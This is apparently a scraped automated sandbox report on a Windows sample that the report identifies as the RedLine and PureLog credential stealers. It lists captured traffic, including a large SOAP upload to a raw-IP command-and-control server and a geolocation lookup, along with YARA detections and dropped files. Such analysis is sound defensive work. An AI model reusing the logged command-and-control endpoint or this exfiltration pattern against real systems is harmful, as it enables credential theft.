Jan 19, 2025 13:02:23.634335995 CET	241	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 185.222.57.84:55615 Content-Length: 927727 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jan 19, 2025 13:02:25.101660013 CET	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sun, 19 Jan 2025 12:02:21 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49743	104.26.12.31	443	7572	C:\Users\user\Desktop\chTJmCR9bS.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-19 12:02:20 UTC	64	OUT	GET /geoip HTTP/1.1 Host: api.ip.sb Connection: Keep-Alive
2025-01-19 12:02:20 UTC	943	IN	HTTP/1.1 200 OK Date: Sun, 19 Jan 2025 12:02:20 GMT Content-Type: application/json; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding Cache-Control: no-cache access-control-allow-origin: * cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B7Gh%2FUmAm4JrkpV9eKMm7mFIcA%2BYPo0CJkLPoskI%2FjHOFg8xmAzOHVKNgdh6i8%2FkQ90M8U5scAjfENDtftn29una8t1rAygaHKNl3dLWeofEHRYrt3HFusiq4Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Server: cloudflare CF-RAY: 9046acdd88d280dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1518&min_rtt=1512&rtt_var=579&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2806&recv_bytes=678&delivery_rate=1869398&cwnd=152&unsent_bytes=0&cid=5b7701b53ca299ed&ts=425&x=0"
2025-01-19 12:02:20 UTC	351	IN	Data Raw: 31 35 38 0d 0a 7b 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 37 34 2e 30 30 36 36 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 22 2c 22 6f 66 66 73 65 74 22 3a 2d 31 38 30 30 30 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 61 73 6e 5f 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 4c 45 56 45 4c 33 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 6c 61 74 69 74 75 64 65 Data Ascii: 158{"organization":"CenturyLink","longitude":-74.0066,"city":"New York","timezone":"America\/New_York","isp":"CenturyLink","offset":-18000,"region":"New York","asn":3356,"asn_organization":"LEVEL3","country":"United States","ip":"8.46.123.189","latitude
2025-01-19 12:02:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	07:02:07
Start date:	19/01/2025
Path:	C:\Users\user\Desktop\chTJmCR9bS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\chTJmCR9bS.exe"
Imagebase:	0xe30000
File size:	582'144 bytes
MD5 hash:	963F526636C53E9ECF5AF8025E0DACA0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1826964666.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1824869359.000000000450A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1824869359.000000000450A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1824869359.000000000450A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1824869359.0000000004347000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1824869359.0000000004347000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1824869359.0000000004347000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1823596554.000000000343E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:02:11
Start date:	19/01/2025
Path:	C:\Users\user\Desktop\chTJmCR9bS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\chTJmCR9bS.exe"
Imagebase:	0xf90000
File size:	582'144 bytes
MD5 hash:	963F526636C53E9ECF5AF8025E0DACA0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1927566473.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.1927566473.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000002.00000002.1927566473.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:02:11
Start date:	19/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report chTJmCR9bS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\chTJmCR9bS.exe.log

C:\Users\user\AppData\Local\Temp\tmp116D.tmp

C:\Users\user\AppData\Local\Temp\tmp116E.tmp

C:\Users\user\AppData\Local\Temp\tmp117F.tmp

C:\Users\user\AppData\Local\Temp\tmp118F.tmp

C:\Users\user\AppData\Local\Temp\tmp1190.tmp

C:\Users\user\AppData\Local\Temp\tmp11A1.tmp

C:\Users\user\AppData\Local\Temp\tmp11B2.tmp

C:\Users\user\AppData\Local\Temp\tmp11B3.tmp

C:\Users\user\AppData\Local\Temp\tmp11C3.tmp

C:\Users\user\AppData\Local\Temp\tmp4B05.tmp

C:\Users\user\AppData\Local\Temp\tmp4B15.tmp

C:\Users\user\AppData\Local\Temp\tmp4B26.tmp

C:\Users\user\AppData\Local\Temp\tmp4B36.tmp

C:\Users\user\AppData\Local\Temp\tmp4B47.tmp

Windows Analysis Report
chTJmCR9bS.exe